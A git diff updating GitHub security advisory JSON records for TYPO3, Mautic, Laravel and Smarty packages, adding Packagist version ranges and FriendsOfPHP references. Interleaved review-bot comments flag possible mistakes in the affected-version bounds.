diff --git a/advisories/github-reviewed/2020/11/GHSA-q9cp-mc96-m4w2/GHSA-q9cp-mc96-m4w2.json b/advisories/github-reviewed/2020/11/GHSA-q9cp-mc96-m4w2/GHSA-q9cp-mc96-m4w2.json index 616ceb787d814..042b8b9dd1559 100644 --- a/advisories/github-reviewed/2020/11/GHSA-q9cp-mc96-m4w2/GHSA-q9cp-mc96-m4w2.json +++ b/advisories/github-reviewed/2020/11/GHSA-q9cp-mc96-m4w2/GHSA-q9cp-mc96-m4w2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q9cp-mc96-m4w2", - "modified": "2021-01-07T22:39:29Z", + "modified": "2024-02-05T11:16:11Z", "published": "2020-11-23T21:18:44Z", "aliases": [ "CVE-2020-26229" @@ -25,7 +25,26 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "10.4.0" + "introduced": "10.0.0" + }, + { + "fixed": "10.4.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" }, { "fixed": "10.4.10" @@ -44,6 +63,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26229" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-26229.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-26229.yaml" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-012" @@ -56,6 +83,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2020-11-23T21:16:32Z", - "nvd_published_at": null + "nvd_published_at": "2020-11-23T22:15:12Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2020/12/GHSA-vqqx-jw6p-q3rf/GHSA-vqqx-jw6p-q3rf.json b/advisories/github-reviewed/2020/12/GHSA-vqqx-jw6p-q3rf/GHSA-vqqx-jw6p-q3rf.json index 4e71d7d432e62..f289b243c7934 100644 --- a/advisories/github-reviewed/2020/12/GHSA-vqqx-jw6p-q3rf/GHSA-vqqx-jw6p-q3rf.json +++ b/advisories/github-reviewed/2020/12/GHSA-vqqx-jw6p-q3rf/GHSA-vqqx-jw6p-q3rf.json 
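Review bot: The typo3/cms-core lower bound in GHSA-q9cp-mc96-m4w2 is widened from `"introduced": "10.4.0"` to `"10.0.0"`, and the new typo3/cms entry copies that wider bound, but no reference is added that supports the 10.0–10.3 sprint releases being affected. The only vendor source cited is TYPO3-CORE-SA-2020-012, so its affected-versions line should be checked; if it starts at 10.4.0 the original bound was the precise one and the widening only adds false positives. Widening is the safer direction for consumers, but it should be a deliberate decision rather than a by-product of aligning with the FriendsOfPHP feed.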
@@ -52,6 +52,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.7.0" + }, + { + "fixed": "8.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.23" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.7.0" + }, + { + "fixed": "8.7.38" + } + ] + } + ] } ], "references": [ @@ -63,6 +139,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26227" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-26227.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-26227.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-core" diff --git a/advisories/github-reviewed/2021/01/GHSA-39wj-j3jc-858m/GHSA-39wj-j3jc-858m.json b/advisories/github-reviewed/2021/01/GHSA-39wj-j3jc-858m/GHSA-39wj-j3jc-858m.json index 3bd5e69d10345..dadbcef923c35 100644 --- a/advisories/github-reviewed/2021/01/GHSA-39wj-j3jc-858m/GHSA-39wj-j3jc-858m.json +++ b/advisories/github-reviewed/2021/01/GHSA-39wj-j3jc-858m/GHSA-39wj-j3jc-858m.json @@ -22,10 +22,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "3.0.0" }, { - "fixed": "2.16.5" + "fixed": "3.2.4" } ] } 
@@ -41,10 +41,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0" + "introduced": "2.0.0" }, { - "fixed": "3.2.4" + "fixed": "2.16.5" } ] } @@ -68,6 +68,10 @@ "type": "WEB", "url": "https://forum.mautic.org/c/announcements/16" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2020-35124.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/mautic/core" diff --git a/advisories/github-reviewed/2021/01/GHSA-3p32-j457-pg5x/GHSA-3p32-j457-pg5x.json b/advisories/github-reviewed/2021/01/GHSA-3p32-j457-pg5x/GHSA-3p32-j457-pg5x.json index dae88d6521644..0ccf77c0edd11 100644 --- a/advisories/github-reviewed/2021/01/GHSA-3p32-j457-pg5x/GHSA-3p32-j457-pg5x.json +++ b/advisories/github-reviewed/2021/01/GHSA-3p32-j457-pg5x/GHSA-3p32-j457-pg5x.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "8.0.0" }, { - "fixed": "6.20.12" + "fixed": "8.22.1" } ] } @@ -37,7 +37,7 @@ { "package": { "ecosystem": "Packagist", - "name": "laravel/framework" + "name": "illuminate/database" }, "ranges": [ { @@ -56,7 +56,7 @@ { "package": { "ecosystem": "Packagist", - "name": "laravel/framework" + "name": "illuminate/database" }, "ranges": [ { @@ -82,7 +82,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "6.0.0" }, { "fixed": "6.20.12" @@ -94,17 +94,17 @@ { "package": { "ecosystem": "Packagist", - "name": "illuminate/database" + "name": "laravel/framework" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "7.0.0" + "introduced": "6.0.0" }, { - "fixed": "7.30.3" + "fixed": "6.20.11" } ] } @@ -113,17 +113,17 @@ { "package": { "ecosystem": "Packagist", - "name": "illuminate/database" + "name": "laravel/framework" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "8.0.0" + "introduced": "7.0.0" }, { - "fixed": "8.22.1" + "fixed": "7.30.2" } ] } 
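Review bot: After this change the 6.x line of GHSA-3p32-j457-pg5x carries two different fix versions: the range in the `@@ -82` hunk keeps `"fixed": "6.20.12"`, while the laravel/framework range in the `@@ -94` hunk is changed to `"fixed": "6.20.11"` (and the 7.x one to `"fixed": "7.30.2"`), so laravel/framework 6.20.11 is reported as fixed by one entry and as affected by its sibling. The package name for the 6.20.12 range lies outside the hunk, but whichever package it belongs to, the two release posts referenced (6.20.11/7.30.2 and 6.20.12/7.30.3) should be reconciled into one fixed version per major line. Note also that `"introduced": "0"` became `"6.0.0"` for that range, which silently drops 5.x from the affected set and is only correct if 5.x never shipped the vulnerable code.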
@@ -147,6 +147,18 @@ "type": "WEB", "url": "https://blog.laravel.com/security-laravel-62011-7302-8221-released" }, + { + "type": "WEB", + "url": "https://blog.laravel.com/security-laravel-62012-7303-released" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/illuminate/database/CVE-2021-21263.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/laravel/framework/CVE-2021-21263.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/illuminate/database" diff --git a/advisories/github-reviewed/2021/01/GHSA-p7v4-gm6j-cw9m/GHSA-p7v4-gm6j-cw9m.json b/advisories/github-reviewed/2021/01/GHSA-p7v4-gm6j-cw9m/GHSA-p7v4-gm6j-cw9m.json index df8523e6d7ad4..55b93f9e44b95 100644 --- a/advisories/github-reviewed/2021/01/GHSA-p7v4-gm6j-cw9m/GHSA-p7v4-gm6j-cw9m.json +++ b/advisories/github-reviewed/2021/01/GHSA-p7v4-gm6j-cw9m/GHSA-p7v4-gm6j-cw9m.json @@ -22,10 +22,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "3.0.0" }, { - "fixed": "2.16.5" + "fixed": "3.2.4" } ] } @@ -41,10 +41,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0" + "introduced": "2.0.0" }, { - "fixed": "3.2.4" + "fixed": "2.16.5" } ] } @@ -64,6 +64,10 @@ "type": "WEB", "url": "https://github.com/mautic/mautic/commit/ba31db23e664f889da55a29ff27f797e2ab5cb1b" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-3142.yaml" + }, { "type": "WEB", "url": "https://github.com/mautic/mautic/releases/tag/3.2.4" @@ -71,6 +75,10 @@ { "type": "WEB", "url": "https://www.mautic.org/blog/community/security-release-all-versions-mautic-prior-2-16-5-and-3-2-3" + }, + { + "type": "WEB", + "url": "https://www.mautic.org/blog/community/security-release-all-versions-mautic-prior-2-16-5-and-3-2-4" } ], "database_specific": { 
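Review bot: The second mautic/core range in GHSA-p7v4-gm6j-cw9m now reads `"introduced": "2.0.0"` instead of `"0"`, which excludes every 1.x release, yet the release post added in the same change is titled `security-release-all-versions-mautic-prior-2-16-5-and-3-2-4`. Unless the Mautic advisory explicitly limits this issue to 2.x, the lower bound should be restored to `"0"` so 1.x installs are still flagged; the 3.x range is only reordered and its bounds are unchanged. The same `0` to `2.0.0` narrowing appears in the sibling advisory GHSA-39wj-j3jc-858m earlier in this commit and deserves the same check.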
diff --git a/advisories/github-reviewed/2021/02/GHSA-3rpf-5rqv-689q/GHSA-3rpf-5rqv-689q.json b/advisories/github-reviewed/2021/02/GHSA-3rpf-5rqv-689q/GHSA-3rpf-5rqv-689q.json index 604b355507a83..3cdbdf919c459 100644 --- a/advisories/github-reviewed/2021/02/GHSA-3rpf-5rqv-689q/GHSA-3rpf-5rqv-689q.json +++ b/advisories/github-reviewed/2021/02/GHSA-3rpf-5rqv-689q/GHSA-3rpf-5rqv-689q.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/smarty-php/smarty/commit/165f1bd4d2eec328cfeaca517a725b46001de838" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/smarty/smarty/CVE-2021-26120.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/smarty-php/smarty" diff --git a/advisories/github-reviewed/2021/03/GHSA-2r6j-862c-m2v2/GHSA-2r6j-862c-m2v2.json b/advisories/github-reviewed/2021/03/GHSA-2r6j-862c-m2v2/GHSA-2r6j-862c-m2v2.json index 090e978f024ae..f4f23d130f4b1 100644 --- a/advisories/github-reviewed/2021/03/GHSA-2r6j-862c-m2v2/GHSA-2r6j-862c-m2v2.json +++ b/advisories/github-reviewed/2021/03/GHSA-2r6j-862c-m2v2/GHSA-2r6j-862c-m2v2.json 
@@ -102,6 +102,120 @@ "database_specific": { "last_known_affected_version_range": "<= 11.1.0" } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] } ], "references": [ @@ -113,6 +227,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21355" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21355.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21355.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-form" 
diff --git a/advisories/github-reviewed/2021/03/GHSA-3vg7-jw9m-pc3f/GHSA-3vg7-jw9m-pc3f.json b/advisories/github-reviewed/2021/03/GHSA-3vg7-jw9m-pc3f/GHSA-3vg7-jw9m-pc3f.json index e79d8d1f48142..9b04670c0c743 100644 --- a/advisories/github-reviewed/2021/03/GHSA-3vg7-jw9m-pc3f/GHSA-3vg7-jw9m-pc3f.json +++ b/advisories/github-reviewed/2021/03/GHSA-3vg7-jw9m-pc3f/GHSA-3vg7-jw9m-pc3f.json @@ -102,6 +102,120 @@ "database_specific": { "last_known_affected_version_range": "<= 11.1.0" } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] } ], "references": [ 
@@ -113,6 +227,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21357" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21357.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21357.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-form" diff --git a/advisories/github-reviewed/2021/03/GHSA-4jhw-2p6j-5wmp/GHSA-4jhw-2p6j-5wmp.json b/advisories/github-reviewed/2021/03/GHSA-4jhw-2p6j-5wmp/GHSA-4jhw-2p6j-5wmp.json index f38d72b34b865..6bfe86ec8870a 100644 --- a/advisories/github-reviewed/2021/03/GHSA-4jhw-2p6j-5wmp/GHSA-4jhw-2p6j-5wmp.json +++ b/advisories/github-reviewed/2021/03/GHSA-4jhw-2p6j-5wmp/GHSA-4jhw-2p6j-5wmp.json @@ -81,6 +81,44 @@ "last_known_affected_version_range": "<= 8.7.39" } }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -98,15 +136,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 9.5.24" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { @@ -120,15 +155,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 10.4.13" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { 
@@ -142,10 +174,26 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 11.1.0" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] } ], "references": [ @@ -157,6 +205,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21338" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21338.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21338.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-core" diff --git a/advisories/github-reviewed/2021/03/GHSA-4p9g-qgx9-397p/GHSA-4p9g-qgx9-397p.json b/advisories/github-reviewed/2021/03/GHSA-4p9g-qgx9-397p/GHSA-4p9g-qgx9-397p.json index de170548e16d8..2e5cfa78590d0 100644 --- a/advisories/github-reviewed/2021/03/GHSA-4p9g-qgx9-397p/GHSA-4p9g-qgx9-397p.json +++ b/advisories/github-reviewed/2021/03/GHSA-4p9g-qgx9-397p/GHSA-4p9g-qgx9-397p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4p9g-qgx9-397p", - "modified": "2021-03-29T17:43:44Z", + "modified": "2024-02-07T18:50:34Z", "published": "2021-03-23T01:54:09Z", "aliases": [ "CVE-2021-21359" @@ -15,6 +15,44 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", 
@@ -32,15 +70,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 9.5.24" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { @@ -54,15 +89,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 10.4.13" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { @@ -76,10 +108,26 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 11.1.0" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] } ], "references": [ @@ -91,6 +139,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21359" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21359.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21359.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-core" diff --git a/advisories/github-reviewed/2021/03/GHSA-fjh3-g8gq-9q92/GHSA-fjh3-g8gq-9q92.json b/advisories/github-reviewed/2021/03/GHSA-fjh3-g8gq-9q92/GHSA-fjh3-g8gq-9q92.json index 89afc21192167..e14cdca9db5df 100644 --- a/advisories/github-reviewed/2021/03/GHSA-fjh3-g8gq-9q92/GHSA-fjh3-g8gq-9q92.json +++ b/advisories/github-reviewed/2021/03/GHSA-fjh3-g8gq-9q92/GHSA-fjh3-g8gq-9q92.json 
@@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fjh3-g8gq-9q92", - "modified": "2021-03-23T01:41:27Z", + "modified": "2024-02-02T16:44:46Z", "published": "2021-03-23T01:53:47Z", "aliases": [ "CVE-2021-21340" ], "summary": "Cross-Site Scripting in Content Preview", - "details": "> ### Meta\n> * CVSS: `AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C` (5.0)\n> * CWE-79\n> * Status: **DRAFT**\n\n### Problem\nIt has been discovered that database fields used as _descriptionColumn_ are vulnerable to cross-site scripting when their content gets previewed in the page module. A valid backend user account is needed to exploit this vulnerability.\n\n### Solution\nUpdate to TYPO3 versions 10.4.14, 11.1.1 that fix the problem described.\n\n### Credits\nThanks to Richie Lee who reported this issue and to TYPO3 framework merger Andreas Fernandez who fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-007](https://typo3.org/security/advisory/typo3-core-sa-2021-007)", + "details": "### Problem\nIt has been discovered that database fields used as _descriptionColumn_ are vulnerable to cross-site scripting when their content gets previewed in the page module. A valid backend user account is needed to exploit this vulnerability.\n\n### Solution\nUpdate to TYPO3 versions 10.4.14, 11.1.1 that fix the problem described.\n\n### Credits\nThanks to Richie Lee who reported this issue and to TYPO3 framework merger Andreas Fernandez who fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-007](https://typo3.org/security/advisory/typo3-core-sa-2021-007)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ { 
@@ -55,6 +58,82 @@ "database_specific": { "last_known_affected_version_range": "<= 11.1.0" } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] } ], "references": [ @@ -66,6 +145,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21340" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21340.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21340.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-backend" @@ -79,7 +166,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": "LOW", + "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2021-03-23T01:41:27Z", "nvd_published_at": "2021-03-23T02:15:00Z" diff --git a/advisories/github-reviewed/2021/03/GHSA-qx3w-4864-94ch/GHSA-qx3w-4864-94ch.json b/advisories/github-reviewed/2021/03/GHSA-qx3w-4864-94ch/GHSA-qx3w-4864-94ch.json index bcf2743a32472..e9a9ce497c5f4 100644 --- a/advisories/github-reviewed/2021/03/GHSA-qx3w-4864-94ch/GHSA-qx3w-4864-94ch.json +++ b/advisories/github-reviewed/2021/03/GHSA-qx3w-4864-94ch/GHSA-qx3w-4864-94ch.json 
@@ -81,6 +81,44 @@ "last_known_affected_version_range": "<= 8.7.39" } }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -98,15 +136,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 9.5.24" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { @@ -120,15 +155,12 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 10.4.13" - } + ] }, { "package": { "ecosystem": "Packagist", - "name": "typo3/cms-core" + "name": "typo3/cms" }, "ranges": [ { @@ -142,10 +174,26 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 11.1.0" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] } ], "references": [ @@ -157,6 +205,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21339" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21339.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21339.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-core" diff --git a/advisories/github-reviewed/2021/03/GHSA-w5hr-jm4j-9jvq/GHSA-w5hr-jm4j-9jvq.json b/advisories/github-reviewed/2021/03/GHSA-w5hr-jm4j-9jvq/GHSA-w5hr-jm4j-9jvq.json index 4cb6a335c0209..cc122c6727d97 100644 
--- a/advisories/github-reviewed/2021/03/GHSA-w5hr-jm4j-9jvq/GHSA-w5hr-jm4j-9jvq.json +++ b/advisories/github-reviewed/2021/03/GHSA-w5hr-jm4j-9jvq/GHSA-w5hr-jm4j-9jvq.json @@ -44,6 +44,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-26119" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/smarty/smarty/CVE-2021-26119.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/smarty-php/smarty/" diff --git a/advisories/github-reviewed/2021/03/GHSA-x79j-wgqv-g8h2/GHSA-x79j-wgqv-g8h2.json b/advisories/github-reviewed/2021/03/GHSA-x79j-wgqv-g8h2/GHSA-x79j-wgqv-g8h2.json index b34a003ec36cb..d3badb39e64af 100644 --- a/advisories/github-reviewed/2021/03/GHSA-x79j-wgqv-g8h2/GHSA-x79j-wgqv-g8h2.json +++ b/advisories/github-reviewed/2021/03/GHSA-x79j-wgqv-g8h2/GHSA-x79j-wgqv-g8h2.json @@ -58,6 +58,82 @@ "database_specific": { "last_known_affected_version_range": "<= 11.1.0" } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] } ], "references": [ 
